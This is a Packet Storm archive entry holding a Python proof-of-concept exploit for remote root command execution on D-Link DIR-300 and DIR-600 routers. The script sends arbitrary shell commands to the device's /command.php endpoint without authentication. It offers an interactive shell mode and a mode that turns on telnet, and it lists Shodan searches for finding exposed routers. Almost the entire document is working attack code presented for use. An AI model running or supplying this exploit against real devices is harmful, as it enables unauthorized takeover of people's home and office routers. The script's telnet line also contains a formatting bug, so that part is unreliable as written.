D-LINK DIR-300 / DIR-600 Remote Root

2013-02-08T00:00:00
ID PACKETSTORM:120171
Type packetstorm
Reporter infodox
Modified 2013-02-08T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
# D-LINK TOTAL FAIL  
# http://www.s3cur1ty.de/m1adv2013-003  
# Another Shit PoC by infodox  
# SHODANS BELOW  
# http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-300  
# http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-600  
# Who knew a shell could be so easy?  
import sys  
import requests  
import os  
  
if len(sys.argv) != 3:  
print "Usage: ./dlinkroot.py <target> <mode>"  
print "Modes: shell or telnetenable"  
print "I was lazy so I assume you have a telnet client"  
sys.exit(0)  
  
target = sys.argv[1]  
mode = sys.argv[2]  
  
def shell(target):  
print "[+] Connecting and spawning a shell..."  
while True:  
try:  
bobcat = raw_input("%s:~# " %(target))  
lulz = "cmd=%s;" %(bobcat)  
url = "http://" + target + "/command.php"  
hax = requests.post(url, lulz)  
print hax.text  
except KeyboardInterrupt:  
print "\n[-] Quitting"  
sys.exit(1)  
  
def telnetenable(target):  
lulz = "cmd=telnetd;"  
url = "http://" + target + "/command.php"  
print "[+] Trying to enable telnet"  
try:  
hax = requests.post(url, lulz)  
print hax.text  
except Exception:  
print "[-] IT FAILED IT!"  
sys.exit(0)  
print "[+] Doing a telnet"  
try:  
os.system('telnet %s') %(target)  
except Exception:  
print "[-] IT FAILED IT!"  
sys.exit(1)  
  
if mode == "shell":  
shell(target)  
elif mode == "telnetenable":  
telnetenable(target)  
else:  
print "[:(] WHAT THE FUCK YOU'RE DOING IT WRONG!"  
`